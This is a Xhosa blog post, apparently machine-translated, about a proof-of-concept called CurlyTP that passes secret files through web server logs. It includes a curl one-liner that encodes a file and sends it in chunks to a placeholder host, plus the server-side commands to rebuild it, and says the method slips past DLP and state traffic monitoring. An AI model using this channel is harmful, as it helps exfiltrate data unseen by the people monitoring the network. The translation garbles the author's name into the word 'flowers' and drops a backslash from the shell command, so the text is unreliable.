ProHoster > Ibhulogi > Ulawulo > Utshintshiselwano lwemiyalezo eyimfihlo ngeelog zeseva

Utshintshiselwano lwemiyalezo eyimfihlo ngeelog zeseva

Ngokutsho kwenkcazo yeWikipedia, ithontsi efileyo sisixhobo seyelenqe esisebenzela ukutshintshiselana ngolwazi okanye ezinye izinto phakathi kwabantu abasebenzisa indawo eyimfihlo. Umbono kukuba abantu abaze badibane - kodwa basabelana ngolwazi ukugcina ukhuseleko lokusebenza.

Indawo yokufihla akufanele itsalele ingqalelo. Ke ngoko, kwihlabathi elingaxhunyiwe kwi-intanethi bahlala besebenzisa izinto ezilumkileyo: isitena esixekileyo eludongeni, incwadi yethala leencwadi, okanye umngxuma emthini.

Zininzi izixhobo ezifihliweyo kunye nokungaziwa kwi-Intanethi, kodwa eyona nyani yokusebenzisa ezi zixhobo itsala umdla. Ukongeza, banokuvalelwa kwinqanaba leshishini okanye likarhulumente. Kwenziwe ntoni?

Umphuhlisi weRyan Flowers ucebise ukhetho olunomdla - sebenzisa nayiphi na iseva yewebhu njengendawo yokuzimela. Ukuba ucinga ngayo, wenza ntoni umncedisi wewebhu? Ifumana izicelo, ikhuphe iifayile kwaye ibhale iilogi. Kwaye igcina zonke izicelo, nezingalunganga!

Kuyavela ukuba nayiphi na iseva yewebhu ikuvumela ukuba ugcine phantse nawuphi na umyalezo kwilogi. Iintyatyambo zazibuza ukuba zingayisebenzisa njani le nto.

Unika olu khetho:

  1. Thatha ifayile yombhalo (umyalezo oyimfihlo) kwaye ubale i-hash (md5sum).
  2. Siyikhowudi (gzip+uuencode).
  3. Sibhalela kwilogi usebenzisa isicelo esingalunganga ngamabomu kumncedisi.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Ukufunda ifayile, kufuneka wenze le misebenzi ngokulandelelana: decode kwaye unzip ifayile, khangela i-hash (i-hash inokudluliselwa ngokukhuselekileyo kwiziteshi ezivulekileyo).

Izithuba zitshintshwa nge =+=ukuze kungabikho zithuba kwidilesi. Inkqubo, leyo umbhali abiza ngokuba yi-CurlyTP, isebenzisa i-base64 encoding, njengezihlomelo ze-imeyile. Isicelo senziwa ngegama elingundoqo ?transfer?ukuze umamkeli akwazi ukuyifumana lula kwiilog.

Sibona ntoni kwizigodo kule meko?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Njengoko sele kukhankanyiwe, ukufumana umyalezo oyimfihlo kufuneka wenze imisebenzi ngolandelelwano:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Inkqubo kulula ukuzenzekelayo. I-Md5sum iyahambelana, kunye nemixholo yefayile iqinisekisa ukuba yonke into yaqondwa ngokuchanekileyo.

Indlela ilula kakhulu. β€œInjongo yalo msebenzi kukubonisa nje ukuba iifayile zinokugqithiselwa ngezicelo ezincinci zewebhu, kwaye zisebenza kuyo nayiphi na iseva yewebhu enemibhalo ecacileyo. Ngokwenyani, yonke iseva yewebhu yindawo yokuzimela! ” kubhala iintyatyambo.

Ngokuqinisekileyo, indlela isebenza kuphela ukuba umamkeli unokufikelela kwiilog zeseva. Kodwa ukufikelela okunjalo kubonelelwa, umzekelo, ngabamkeli abaninzi.

Indlela yokuyisebenzisa?

URyan Flowers uthi akayiyo ingcali yokhuseleko lolwazi kwaye akayi kuqulunqa uluhlu lweendlela ezinokusetyenziswa kwi-CurlyTP. Kuye, bubungqina nje bengcamango yokuba izixhobo eziqhelekileyo esizibonayo imihla ngemihla zingasetyenziswa ngendlela engaqhelekanga.

Enyanisweni, le ndlela ineenzuzo ezininzi ngaphezu kwesinye iseva "izifihla" ezifana Digital Dead Drop okanye Ibhokisi yePirate: ayifuni uqwalaselo olukhethekileyo kwicala lomncedisi okanye naziphi na iiprothokholi ezikhethekileyo - kwaye ayizukuvusa urhano phakathi kwabo babeka iliso kwitrafikhi. Akunakwenzeka ukuba inkqubo ye-SORM okanye ye-DLP iya kuskena ii-URL zeefayile zeteksti ezicinezelweyo.

Le yenye yeendlela zokudlulisa imiyalezo ngeefayile zenkonzo. Unokukhumbula ukuba ezinye iinkampani ezihambele phambili zazidla ngokubeka njani Imisebenzi yoPhuhlisi kwi-HTTP Header okanye kwikhowudi yamaphepha e-HTML.

Utshintshiselwano lwemiyalezo eyimfihlo ngeelog zeseva

Ingcamango yayikukuba ngabaphuhlisi bewebhu kuphela abaza kubona eli qanda lePasika, kuba umntu oqhelekileyo akayi kujonga iintloko okanye ikhowudi ye-HTML.

Utshintshiselwano lwemiyalezo eyimfihlo ngeelog zeseva

umthombo: www.habr.com

Yongeza izimvo